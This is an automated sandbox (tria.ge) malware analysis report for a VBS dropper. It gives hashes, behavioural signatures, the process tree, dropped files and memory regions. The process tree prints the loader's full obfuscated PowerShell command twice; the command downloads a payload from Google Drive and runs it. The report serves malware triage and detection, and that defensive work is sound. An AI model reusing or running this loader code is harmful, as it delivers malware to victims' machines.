Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

4667d2988c...0c.vbs

windows7-x64

10

4667d2988c...0c.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/04/2024, 01:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c.vbs

  • Size

    278KB

  • MD5

    1afdbe303941cc8155f48c9b61bd3df4

  • SHA1

    d141b2f53f5679299bcd802791697bc831dd0a98

  • SHA256

    4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c

  • SHA512

    ac39f37a13dcb7dd6d41fc6a18f8b4cd190cfe9f5131e75c5ae29ea0b355ab1339138dde807df59080e68dd769590b7d43598f9532045568c6afa07dd70ed891

  • SSDEEP

    6144:LrdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scO4c8J1BFew9:/nS2ImPy2wrB

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3464
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
        3⤵
          PID:2296
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1432
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
            4⤵
              PID:2840
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 2452
              4⤵
              • Program crash
              PID:3892
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1432 -ip 1432
        1⤵
          PID:464

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nudvghov.foy.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Prehatred.Fid
          Filesize

          416KB

          MD5

          19b0efa692322da3f33d9ba4ee8bde8a

          SHA1

          fb78ba19aba010c732dde93fe6c2392b9c3fdcfa

          SHA256

          b8a96d3dc14996c2df76ba2f139f9b885fc95bf69e9e2b3b989b0733e15c8510

          SHA512

          a6c84ce8c1f5bcf461561e5c5eae60ebaea49ceca0a3e009d9e968e7d9cf927a29edf4f6d0260b7e4325ad2395c03499db26890b6e8daf2b8321e0e3db247d99

          Download Submit

        • memory/1432-26-0x0000000005C70000-0x0000000005CD6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1432-37-0x0000000005E50000-0x00000000061A4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1432-47-0x0000000074AF0000-0x00000000752A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1432-19-0x0000000002A20000-0x0000000002A56000-memory.dmp

          Filesize

          216KB

          Download

        • memory/1432-20-0x0000000074AF0000-0x00000000752A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1432-21-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1432-27-0x0000000005CE0000-0x0000000005D46000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1432-23-0x0000000005510000-0x0000000005B38000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/1432-24-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1432-25-0x0000000005480000-0x00000000054A2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1432-44-0x00000000085A0000-0x0000000008B44000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/1432-43-0x00000000073A0000-0x00000000073C2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1432-41-0x00000000068D0000-0x00000000068EA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1432-38-0x0000000006330000-0x000000000634E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1432-39-0x0000000006390000-0x00000000063DC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1432-40-0x0000000007970000-0x0000000007FEA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/1432-42-0x0000000007440000-0x00000000074D6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/3464-6-0x00000159FDCF0000-0x00000159FDD12000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3464-22-0x00007FFA81B70000-0x00007FFA82631000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3464-15-0x00000159FDC70000-0x00000159FDC80000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3464-10-0x00007FFA81B70000-0x00007FFA82631000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3464-46-0x00000159FDC70000-0x00000159FDC80000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3464-18-0x00000159FDC70000-0x00000159FDC80000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3464-50-0x00007FFA81B70000-0x00007FFA82631000-memory.dmp

          Filesize

          10.8MB

          Download